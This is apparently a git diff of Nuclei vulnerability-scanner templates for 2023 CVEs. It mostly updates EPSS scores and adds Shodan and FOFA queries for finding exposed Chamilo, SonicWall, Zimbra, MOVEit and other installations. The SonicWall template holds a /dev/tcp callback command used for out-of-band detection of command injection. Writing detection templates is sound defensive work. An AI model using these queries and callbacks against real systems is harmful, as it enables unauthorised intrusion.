digest: 4a0a0047304502202ab4c628873460f2450f08b11e80f078a6d0897b010d8398a0e924934fa472ad0221008f8a015712102adee570ab25cbaa41f8b3a5b382718f672cb82b4c1c5698c6a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3368.yaml b/http/cves/2023/CVE-2023-3368.yaml index ccf1544419..592f7f39fb 100644 --- a/http/cves/2023/CVE-2023-3368.yaml +++ b/http/cves/2023/CVE-2023-3368.yaml @@ -19,15 +19,18 @@ info: cvss-score: 9.8 cve-id: CVE-2023-3368 cwe-id: CWE-78 - epss-score: 0.76057 - epss-percentile: 0.97911 + epss-score: 0.93283 + epss-percentile: 0.99063 cpe: cpe:2.3:a:chamilo:chamilo:*:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: chamilo product: chamilo - shodan-query: http.component:"Chamilo" + shodan-query: + - http.component:"Chamilo" + - http.component:"chamilo" + - cpe:"cpe:2.3:a:chamilo:chamilo" tags: cve2023,cve,chamilo,unauth,cmd,rce http: @@ -76,4 +79,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 490a004630440220045df4ec7bd54f950a3e0c12515456f864f6b6b0c5157bf1926e6f7a8e0759ef02203aed940f4a3d5004abd9ab1a98f0acba93578c711cb452f66bc908ae41ee4bcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204203ba81fa59deac5f8f0d0493727281f224ec0c682985a92a6e5399f6744213022100a8aec5d2c5159a5d6ec7bda077faa90c224689b24475f9cd3d24b1e18eed12b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-33831.yaml b/http/cves/2023/CVE-2023-33831.yaml index 2bc8975120..554c2161cf 100644 --- a/http/cves/2023/CVE-2023-33831.yaml +++ b/http/cves/2023/CVE-2023-33831.yaml @@ -16,15 +16,17 @@ info: cvss-score: 9.8 cve-id: CVE-2023-33831 cwe-id: CWE-77 - epss-score: 0.04822 - epss-percentile: 0.91961 + epss-score: 0.21555 + epss-percentile: 0.96432 cpe: cpe:2.3:a:frangoteam:fuxa:1.1.13:*:*:*:*:*:*:* metadata: verified: "true" max-request: 2 vendor: frangoteam product: fuxa - fofa-query: title="FUXA" + fofa-query: + - title="FUXA" + - title="fuxa" tags: cve,cve2023,rce,intrusive,frangoteam,fuxa,unauth variables: filename: "{{rand_base(6)}}" @@ -59,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c3a7d1063d8635eb891376a22064bd392f1ead31bb4930547b533a9efa30ca36022065ed89b3798c768de3abfc936c9f78d68c3320d5e0f93b7f3908128065037934:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203ecc9e2539c4ae2f8e80d3d097bd798fb303f0d202dbb192204c255ee474b6ea022100fb05e48650addf82e05cd993eb891e678cccb6e80b9780fb1215286f02fc549f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34020.yaml b/http/cves/2023/CVE-2023-34020.yaml index 823a82a3bb..95255a6a06 100644 --- a/http/cves/2023/CVE-2023-34020.yaml +++ b/http/cves/2023/CVE-2023-34020.yaml @@ -3,12 +3,20 @@ id: CVE-2023-34020 info: name: Uncanny Toolkit for LearnDash - Open Redirection author: LeDoubleTake - severity: low + severity: medium description: | A vulnerability in the WordPress Uncanny Toolkit for LearnDash Plugin allowed malicious actors to redirect users, posing a potential risk of phishing incidents. The issue has been resolved in version 3.6.4.4, and users are urged to update for security. reference: - https://patchstack.com/database/vulnerability/uncanny-learndash-toolkit/wordpress-uncanny-toolkit-for-learndash-plugin-3-6-4-3-open-redirection-vulnerability - https://wordpress.org/plugins/uncanny-learndash-toolkit/ + - https://patchstack.com/database/vulnerability/uncanny-learndash-toolkit/wordpress-uncanny-toolkit-for-learndash-plugin-3-6-4-3-open-redirection-vulnerability?_s_id=cve + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N + cvss-score: 4.7 + cve-id: CVE-2023-34020 + cwe-id: CWE-601 + epss-score: 0.00076 + epss-percentile: 0.32361 metadata: verified: true max-request: 1 @@ -25,4 +33,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' -# digest: 4a0a00473045022100863feeb025ff903aec139893d251ec1fb6d2afd5b5817e69dba4be2f8939696902201d851c543d8c5013957bc626be07c2d192201385d1a8f3ab7505696dc02b13e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201c291b8c777b1f2832181c0b177acec46e3a1864d8cda77bb5d56b7aabd0cf5d022100bb38f50f255d8d3fcea6bbe1d7bc2367500fee3c65ea13c990bc0c970a2f4934:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34124.yaml b/http/cves/2023/CVE-2023-34124.yaml index e5f230a074..49b6bf1bb0 100644 --- a/http/cves/2023/CVE-2023-34124.yaml +++ b/http/cves/2023/CVE-2023-34124.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-34124 cwe-id: CWE-287,CWE-305 - epss-score: 0.0172 - epss-percentile: 0.87553 + epss-score: 0.03433 + epss-percentile: 0.91476 cpe: cpe:2.3:a:sonicwall:analytics:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: sonicwall product: analytics shodan-query: http.favicon.hash:-1381126564 + fofa-query: icon_hash=-1381126564 tags: cve2023,cve,sonicwall,shell,injection,auth-bypass,instrusive variables: callback: "echo 1 > /dev/tcp/{{interactsh-url}}/80" @@ -90,4 +91,4 @@ http: group: 1 regex: - "getPwdHash.*,'([0-9]+)'" -# digest: 4a0a00473045022100dff5af913f6255a502dbf50816f39ec4a629ff0e3275b9fd2aa5c0d742b9a85202207d90e978f0d17059baa99aac6f41112ed07e6dda4ec8b392b8ed6ea5956c3716:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220535bce466bdc32d6868a70227a183d1b6246f93d044a5aecde35e07f4ddb140a022100d8d1f4d3c91b5da971ecd3f6a2c1431fca7c60a3ba9bf7dbcdbacea3a67bdbe0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34192.yaml b/http/cves/2023/CVE-2023-34192.yaml index ee63c31ebe..e178faefb9 100644 --- a/http/cves/2023/CVE-2023-34192.yaml +++ b/http/cves/2023/CVE-2023-34192.yaml @@ -28,8 +28,14 @@ info: max-request: 2 vendor: zimbra product: collaboration - shodan-query: http.favicon.hash:475145467 - fofa-query: icon_hash="475145467" + shodan-query: + - http.favicon.hash:475145467 + - http.favicon.hash:"1624375939" + - http.favicon.hash:"475145467" + fofa-query: + - icon_hash="475145467" + - icon_hash="1624375939" + - app="zimbra-邮件系统" tags: cve,cve2023,zimbra,xss,authenticated http: @@ -62,4 +68,4 @@ http: part: header_2 status: - 200 -# digest: 4a0a0047304502206e6e2e31f12f413d607f331c70a813d47580ec6ec53dcce86d690fd6505686a2022100bbd8564bab04300d1f08a1cf09442181e45d39f92e9b67e9190f3b16b34ed363:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202d1c08a0e387f7a0f13c9ada8e2f597b8aec1b31bfbd57e342a5f4cf34b5da26022027268948a9b4484fb12ec8b0efeb9af7f007fde3a69b72d77d87c4e73dfcf8a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34259.yaml b/http/cves/2023/CVE-2023-34259.yaml index 339c29a255..ac440faa69 100644 --- a/http/cves/2023/CVE-2023-34259.yaml +++ b/http/cves/2023/CVE-2023-34259.yaml @@ -19,8 +19,8 @@ info: cvss-score: 4.9 cve-id: CVE-2023-34259 cwe-id: CWE-22 - epss-score: 0.00554 - epss-percentile: 0.77111 + epss-score: 0.00559 + epss-percentile: 0.77589 cpe: cpe:2.3:o:kyocera:d-copia253mf_plus_firmware:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,7 @@ info: vendor: kyocera product: d-copia253mf_plus_firmware shodan-query: http.favicon.hash:-50306417 + fofa-query: icon_hash=-50306417 tags: cve,cve2023,packetstorm,seclists,kyocera,lfi,printer http: @@ -50,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100dfe11a778c6bdc20a3e3c51aa378203f41b531b6cf2b922ffddca585df371d4e022100ea0109fec66b77cdff0258b416143e4a92a9b0da63dd600edb0836e302cc174e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220565b9c37b53169915914ce76aa88eda5c5c85f6f97f130b384923bb32f87173f022100f64be4191c6db18ae4d2c6447f91bd5a10dd17c89ffed7373b4c903b24da0ed4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34362.yaml b/http/cves/2023/CVE-2023-34362.yaml index 19d090b842..ac5b3e2c32 100644 --- a/http/cves/2023/CVE-2023-34362.yaml +++ b/http/cves/2023/CVE-2023-34362.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-34362 cwe-id: CWE-89 - epss-score: 0.95418 - epss-percentile: 0.99231 + epss-score: 0.95916 + epss-percentile: 0.99457 cpe: cpe:2.3:a:progress:moveit_cloud:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: progress product: moveit_cloud shodan-query: http.favicon.hash:989289239 + fofa-query: icon_hash=989289239 tags: cve2023,cve,packetstorm,moveit,rce,sqli,intrusive,kev,progress variables: sessioncookie: "{{randstr}}" @@ -130,4 +131,4 @@ http: regex: - '"access_token":"([^"]+)"' part: body -# digest: 4a0a00473045022100b66b36a008640a423f2f0fa1a14b6eb4ea8e0c6286f98b3bda9ed0b5bca93d6602207271e8506cb66d80bf7ba5b3e3dffb13a6d9efb504e04a023023eabc45ac1ea2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f72d08a9b9e841e0d447155a1414f61d5ae334e47b039783b1c835489d799ab2022100952cf077ba2d49d2a333ddb774a88cc81eaba6a5ac76e2ed85bdfe6974a14999:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34537.yaml b/http/cves/2023/CVE-2023-34537.yaml index e7dcc114c3..bdca1869aa 100644 --- a/http/cves/2023/CVE-2023-34537.yaml +++ b/http/cves/2023/CVE-2023-34537.yaml @@ -13,19 +13,28 @@ info: reference: - https://github.com/leekenghwa/CVE-2023-34537---XSS-reflected--found-in-HotelDruid-3.0.5 - https://nvd.nist.gov/vuln/detail/CVE-2023-34537 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/nomi-sec/PoC-in-GitHub classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2023-34537 cwe-id: CWE-79 - epss-score: 0.0007 - epss-percentile: 0.28902 + epss-score: 0.00084 + epss-percentile: 0.35673 cpe: cpe:2.3:a:digitaldruid:hoteldruid:3.0.5:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: digitaldruid product: hoteldruid + shodan-query: + - http.title:"hoteldruid" + - http.favicon.hash:-1521640213 + fofa-query: + - title="hoteldruid" + - icon_hash=-1521640213 + google-query: intitle:"hoteldruid" tags: cve2023,cve,hoteldrui,xss,authenticated,digitaldruid http: @@ -53,4 +62,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "HotelDruid")' condition: and -# digest: 4a0a0047304502200de8e633c0dd2ad6adb380982fe7ad6513164c424ed34a3632ca17c73f0920e10221009c417b2df6c96eefaeb795d7f1b2f7c2ad6db0d80b376dbeda82d37ab8bb5554:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f3f3315840ceba00d13b5c5ce93a76c9259e008ef9c8bf5692c813dd0b0ab6d9022100b7cbb68c5ca5cf00ed6c8019434f98066908a67db28e95506ba539e884464996:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34598.yaml b/http/cves/2023/CVE-2023-34598.yaml index 72cedccfb6..fc33cfc46a 100644 --- a/http/cves/2023/CVE-2023-34598.yaml +++ b/http/cves/2023/CVE-2023-34598.yaml @@ -21,15 +21,17 @@ info: cvss-score: 9.8 cve-id: CVE-2023-34598 cwe-id: CWE-22 - epss-score: 0.03342 - epss-percentile: 0.9114 + epss-score: 0.02842 + epss-percentile: 0.90694 cpe: cpe:2.3:a:gibbonedu:gibbon:25.0.00:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: gibbonedu product: gibbon - shodan-query: http.favicon.hash:-165631681 + shodan-query: + - http.favicon.hash:-165631681 + - http.favicon.hash:"-165631681" fofa-query: icon_hash="-165631681" tags: cve2023,cve,gibbon,lfi,gibbonedu @@ -49,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100eaebd01f85c85ab0ac1c84e6687bddb67703b7b394beddfc320b8a31e9c6cd8d022100d361cee4f4db9cd03330b2674ac1fdba912a93c4ea328fdca0d56ded1ca1dd72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e109ccf0a50716484e972ba9e89838a49010d879762fc41193f517518acdc4dd0220531108ca8ef31c09920ca876751c47ab0893e4ea3088c3c5bbfd1cf18c1a7e62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34599.yaml b/http/cves/2023/CVE-2023-34599.yaml index dfabd8690a..52e4c14722 100644 --- a/http/cves/2023/CVE-2023-34599.yaml +++ b/http/cves/2023/CVE-2023-34599.yaml @@ -13,19 +13,25 @@ info: reference: - https://github.com/maddsec/CVE-2023-34599 - https://vulmon.com/searchpage?q=CVE-2023-34599 + - https://github.com/Imahian/CVE-2023-34599 + - https://github.com/hheeyywweellccoommee/CVE-2023-34599-xsddo + - https://github.com/nomi-sec/PoC-in-GitHub classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-34599 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29205 + epss-percentile: 0.30482 cpe: cpe:2.3:a:gibbonedu:gibbon:25.0.00:*:*:*:*:*:*:* metadata: max-request: 2 vendor: gibbonedu product: gibbon - shodan-query: http.favicon.hash:-165631681 + shodan-query: + - http.favicon.hash:-165631681 + - http.favicon.hash:"-165631681" + fofa-query: icon_hash="-165631681" tags: cve2023,cve,gibbon,xss,authenticated,intrusive,gibbonedu http: @@ -82,4 +88,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203cec5c69d848ab901cd50048ccf42101ac2225bf4526924741e76b9c2d71f0c602205a4b024f5bc6a5bf347f17eaecb260bd276bc4001285005c217c13d424a5b233:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202974a145b40ba9985926a27dc907325442449e624ece6d16be8a7afc9354b809022061ae90666c104b8a80cc8c011bfb5f953dc09e7cb670858292cad5cdd64d31b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3460.yaml b/http/cves/2023/CVE-2023-3460.yaml index 13662666d8..0bebb53fd9 100644 --- a/http/cves/2023/CVE-2023-3460.yaml +++ b/http/cves/2023/CVE-2023-3460.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-3460 cwe-id: CWE-269 - epss-score: 0.08148 - epss-percentile: 0.93712 + epss-score: 0.06326 + epss-percentile: 0.93621 cpe: cpe:2.3:a:ultimatemember:ultimate_member:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: ultimatemember product: ultimate_member framework: wordpress + shodan-query: http.html:/wp-content/plugins/ultimate-member + fofa-query: body=/wp-content/plugins/ultimate-member publicwww-query: /wp-content/plugins/ultimate-member google-query: inurl:/wp-content/plugins/ultimate-member tags: cve,cve2023,wordpress,wp,wp-plugin,auth-bypass,intrusive,wpscan,ultimatemember @@ -103,4 +105,4 @@ http: dsl: - '"WP_USERNAME: "+ username' - '"WP_PASSWORD: "+ password' -# digest: 4b0a00483046022100b493c7d63335e4d391cb5cc16773998839c91742ebdca9ed34de149a896d8635022100dd6e41ff08a478312111f10087ecd9bcf0cab2c7596f13f55ced60e7ff2102bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220173eeac6cfcdda83cedba6a13700d48f6167c4a69304204c41c53291982fec3602204eb02aaf7b7b0995b3b8092e842f23bbb69e20c6b44bb3a7335caf50d296446b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34659.yaml b/http/cves/2023/CVE-2023-34659.yaml index 867bbb630c..4101e78588 100644 --- a/http/cves/2023/CVE-2023-34659.yaml +++ b/http/cves/2023/CVE-2023-34659.yaml @@ -19,14 +19,15 @@ info: cvss-score: 9.8 cve-id: CVE-2023-34659 cwe-id: CWE-89 - epss-score: 0.21629 - epss-percentile: 0.96326 + epss-score: 0.40226 + epss-percentile: 0.97268 cpe: cpe:2.3:a:jeecg:jeecg_boot:3.5.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: jeecg product: jeecg_boot shodan-query: http.favicon.hash:1380908726 + fofa-query: icon_hash=1380908726 tags: cve2023,cve,jeecg,sqli http: @@ -55,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009479667c973f231f672de742d4d97331b4c21e19dbb0a788759c317ba27f8c39022048d0e0658080c3f33b833368dad4f9bf938432524fa1d99a3bc9bb30daf57e9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220261dcb2fc690e0650162d3d2590314a23a7e22334a2d7a97876251db319cf4e402207e8d42b990514592525016042ca6befa9c490acf09625ea741303d3354fcca40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34751.yaml b/http/cves/2023/CVE-2023-34751.yaml index 9edc4bae5e..6660a05ef1 100644 --- a/http/cves/2023/CVE-2023-34751.yaml +++ b/http/cves/2023/CVE-2023-34751.yaml @@ -15,15 +15,17 @@ info: cvss-score: 9.8 cve-id: CVE-2023-34751 cwe-id: CWE-89 - epss-score: 0.02354 - epss-percentile: 0.89556 + epss-score: 0.0257 + epss-percentile: 0.90221 cpe: cpe:2.3:a:bloofox:bloofoxcms:0.5.2.1:*:*:*:*:*:*:* metadata: verified: "true" max-request: 2 vendor: bloofox product: bloofoxcms - fofa-query: "Powered by bloofoxCMS" + fofa-query: + - "Powered by bloofoxCMS" + - powered by bloofoxcms tags: cve2023,cve,sqli,bloofox,authenticated http: @@ -50,4 +52,4 @@ http: - contains(header_2, "text/html") - contains(body_2, 'bloofoxCMS Admincenter') condition: and -# digest: 490a0046304402206f461d9a22d4192ae50d7184b7c62456f024994ec86af7ac106a6acf92d75e9a02205c9f5d1ee349fbfb52b415a8925b40bc8086234dba1a1db9810e2c19cbc23dcd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204f402a184b02428f1b3b77596205e4955498c3f9860feb5e216df13d55caad7f0221008ca0a4f3fcef19808e026dd67522e147fa57ea364fe8b1d5b96a3579e23554ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34752.yaml b/http/cves/2023/CVE-2023-34752.yaml index 8eee0e5231..3de67af58d 100644 --- a/http/cves/2023/CVE-2023-34752.yaml +++ b/http/cves/2023/CVE-2023-34752.yaml @@ -17,15 +17,17 @@ info: cvss-score: 9.8 cve-id: CVE-2023-34752 cwe-id: CWE-89 - epss-score: 0.0945 - epss-percentile: 0.9459 + epss-score: 0.14896 + epss-percentile: 0.95799 cpe: cpe:2.3:a:bloofox:bloofoxcms:0.5.2.1:*:*:*:*:*:*:* metadata: verified: "true" max-request: 2 vendor: bloofox product: bloofoxcms - fofa-query: "Powered by bloofoxCMS" + fofa-query: + - "Powered by bloofoxCMS" + - powered by bloofoxcms tags: cve,cve2023,sqli,bloofox,authenticated http: @@ -52,4 +54,4 @@ http: - contains(header_2, "text/html") - contains(body_2, 'bloofoxCMS Admincenter') condition: and -# digest: 4a0a00473045022100d2ee0c48456364462d7c1a8ea7bb091882fa60e3f5feef0fbf0e95d002a1f9d502200ec877b901dcbe66ed9604657f506954e463a2e83c5da054a3d0a25a2872cea5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022030bf54a98de12d6a8cbe3a62a7867a738139405cafddbeada35786671990f41302207b218e6af53247a81c33446d5f51a7e4fba79b922726da92806dc2b13ddeef23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34753.yaml b/http/cves/2023/CVE-2023-34753.yaml index 6d1d4d166c..060fa03f11 100644 --- a/http/cves/2023/CVE-2023-34753.yaml +++ b/http/cves/2023/CVE-2023-34753.yaml @@ -15,15 +15,17 @@ info: cvss-score: 9.8 cve-id: CVE-2023-34753 cwe-id: CWE-89 - epss-score: 0.02354 - epss-percentile: 0.89556 + epss-score: 0.0257 + epss-percentile: 0.90221 cpe: cpe:2.3:a:bloofox:bloofoxcms:0.5.2.1:*:*:*:*:*:*:* metadata: verified: "true" max-request: 2 vendor: bloofox product: bloofoxcms - fofa-query: "Powered by bloofoxCMS" + fofa-query: + - "Powered by bloofoxCMS" + - powered by bloofoxcms tags: cve,cve2023,sqli,bloofox,authenticated http: @@ -50,4 +52,4 @@ http: - contains(header_2, "text/html") - contains(body_2, 'bloofoxCMS Admincenter') condition: and -# digest: 4a0a00473045022100f737b834d8d2f63b18c8ba8cf13ec2d6d966422dde65c1cbe93267a6e3eb3e7e02206668e55a7520baf24cf028a0f98825d967c1ec5440bc46a3b838c8d15e22f6e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a9e0a231234787b15b648a6dfecaeec34f61f735603c1645561714de11ce66e6022007b345d1312a924c1bb7cdf413ffd7a61febb92459a3facc5a9789caa6e967d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34755.yaml b/http/cves/2023/CVE-2023-34755.yaml index a92f5f1025..8f7c709f6b 100644 --- a/http/cves/2023/CVE-2023-34755.yaml +++ b/http/cves/2023/CVE-2023-34755.yaml @@ -15,15 +15,17 @@ info: cvss-score: 9.8 cve-id: CVE-2023-34755 cwe-id: CWE-89 - epss-score: 0.01254 - epss-percentile: 0.84129 + epss-score: 0.0257 + epss-percentile: 0.90221 cpe: cpe:2.3:a:bloofox:bloofoxcms:0.5.2.1:*:*:*:*:*:*:* metadata: verified: "true" max-request: 2 vendor: bloofox product: bloofoxcms - fofa-query: "Powered by bloofoxCMS" + fofa-query: + - "Powered by bloofoxCMS" + - powered by bloofoxcms tags: cve,cve2023,sqli,bloofox,authenticated http: @@ -50,4 +52,4 @@ http: - contains(header_2, "text/html") - contains(body_2, 'bloofoxCMS Admincenter') condition: and -# digest: 4b0a00483046022100bc99c284b4061d571cd1f1f53fd4e4672d259fe90e88211dffdc8cf9fae2e535022100feddc93a339ace87fe03ff5ac04e7dcaccd3a1c432b3d375626183619de26896:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022032f9ef103860ed8443efeacbaf4866b3fd14fd37d2516e607080b5c04ec0bb6d022100a0faf26e8239032272fddd3087a50d7c435351f7f708238c8a7161b260ceab53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34756.yaml b/http/cves/2023/CVE-2023-34756.yaml index b5bebab94f..0f0b45fc1e 100644 --- a/http/cves/2023/CVE-2023-34756.yaml +++ b/http/cves/2023/CVE-2023-34756.yaml @@ -15,15 +15,17 @@ info: cvss-score: 9.8 cve-id: CVE-2023-34756 cwe-id: CWE-89 - epss-score: 0.02354 - epss-percentile: 0.89556 + epss-score: 0.0257 + epss-percentile: 0.90221 cpe: cpe:2.3:a:bloofox:bloofoxcms:0.5.2.1:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: bloofox product: bloofoxcms - fofa-query: "Powered by bloofoxCMS" + fofa-query: + - "Powered by bloofoxCMS" + - powered by bloofoxcms tags: cve,cve2023,sqli,bloofox,authenticated http: @@ -51,4 +53,4 @@ http: - contains(header, "text/html") - contains(body_2, 'Admincenter') condition: and -# digest: 4b0a004830460221008292d511617bd0c0a8bcafe1cfa684cc711d54ab9a4eb35f63670ed0da9bb7070221008b351cb79ef3863804a1be0bb6833d415171ff25050bffc03a68641202906cd6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b1803d30aa04646f293cfa1056675d9ff48d6c5b3292d05e0248b3bda92d5158022012461a8f49d686040da02bcf1fb55825bb9ae2bc3b76d8fa3e6747e2f229edd8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3479.yaml b/http/cves/2023/CVE-2023-3479.yaml index 365467b10d..a8a9b783f2 100644 --- a/http/cves/2023/CVE-2023-3479.yaml +++ b/http/cves/2023/CVE-2023-3479.yaml @@ -20,14 +20,20 @@ info: cve-id: CVE-2023-3479 cwe-id: CWE-79 epss-score: 0.0007 - epss-percentile: 0.28961 + epss-percentile: 0.30234 cpe: cpe:2.3:a:hestiacp:control_panel:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: hestiacp product: control_panel - shodan-query: http.favicon.hash:-476299640 + shodan-query: + - http.favicon.hash:-476299640 + - http.title:"hestia control panel" + fofa-query: + - title="hestia control panel" + - icon_hash=-476299640 + google-query: intitle:"hestia control panel" tags: cve2023,cve,huntr,hestiacp,xss,intrusive http: @@ -52,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210098751517d9e020d64addef3f14cedca2d680492140d36e7544d0aa498932ce6102207f8df37d808c0662f751c6bef40da619f38e4f2303bc45fffc57c6bd1a656b2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204f455524bdd08b261a7ac9ae06489916ec86682f339632160689c6ea834fb104022100fa4a8034622c08b9ae97a765b2cf660b9fc3ef6471f3f045ae0a2c5cbf5a67a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34843.yaml b/http/cves/2023/CVE-2023-34843.yaml index 668506d369..52a7db87ab 100644 --- a/http/cves/2023/CVE-2023-34843.yaml +++ b/http/cves/2023/CVE-2023-34843.yaml @@ -21,15 +21,18 @@ info: cvss-score: 7.5 cve-id: CVE-2023-34843 cwe-id: CWE-22 - epss-score: 0.00349 - epss-percentile: 0.71237 + epss-score: 0.00357 + epss-percentile: 0.72064 cpe: cpe:2.3:a:traggo:traggo:0.3.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: traggo product: traggo - shodan-query: html:"traggo" + shodan-query: + - html:"traggo" + - http.html:"traggo" + fofa-query: body="traggo" tags: cve2023,cve,traggo,lfi,server http: @@ -52,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b64fb96d0bdf7e75e75a35ec0199aa1a3b5ad75d08cb6c6005cdab98520d23e2022100edd40b93a955f7bda18c65178cbbb5d427b07936f1be261dae3217d6a0871932:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202ebad3eee21401766cd6d90a74dded43b56efa9cf9b97942cf546a116f18fceb02204cc42560caa90f0647946f365825fa3adaed54fb32df915d1923617404ec7eb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34960.yaml b/http/cves/2023/CVE-2023-34960.yaml index 5b92ad6570..1abcbc5017 100644 --- a/http/cves/2023/CVE-2023-34960.yaml +++ b/http/cves/2023/CVE-2023-34960.yaml @@ -21,15 +21,18 @@ info: cvss-score: 9.8 cve-id: CVE-2023-34960 cwe-id: CWE-77 - epss-score: 0.93541 - epss-percentile: 0.99046 + epss-score: 0.93314 + epss-percentile: 0.99067 cpe: cpe:2.3:a:chamilo:chamilo:*:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: chamilo product: chamilo - shodan-query: http.component:"Chamilo" + shodan-query: + - http.component:"Chamilo" + - http.component:"chamilo" + - cpe:"cpe:2.3:a:chamilo:chamilo" tags: cve,cve2023,packetstorm,chamilo http: @@ -57,4 +60,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202d995b5c47a61e69483f37d5514da329e6e5264c597a3db33117f015a98ea951022074cb814111b69e59c9ca138398de1758fb2b9ddff8e946023fc973237475ec59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022066af9a14b5d4b46b5206573d4676499c39fb49182e834c8aabb6598e4d25330c022100fd5577b9bd3944c2d1fc1cfbdcfe4804e18b88ef0296e85bfc8d26d3f62e55bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34993.yaml b/http/cves/2023/CVE-2023-34993.yaml index 3016937624..7b47e031c2 100644 --- a/http/cves/2023/CVE-2023-34993.yaml +++ b/http/cves/2023/CVE-2023-34993.yaml @@ -16,13 +16,27 @@ info: reference: - https://fortiguard.com/psirt/FG-IR-23-140 - https://www.horizon3.ai/attack-research/attack-blogs/fortiwlm-the-almost-story-for-the-forti-forty/ + classification: + cvss-metrics: 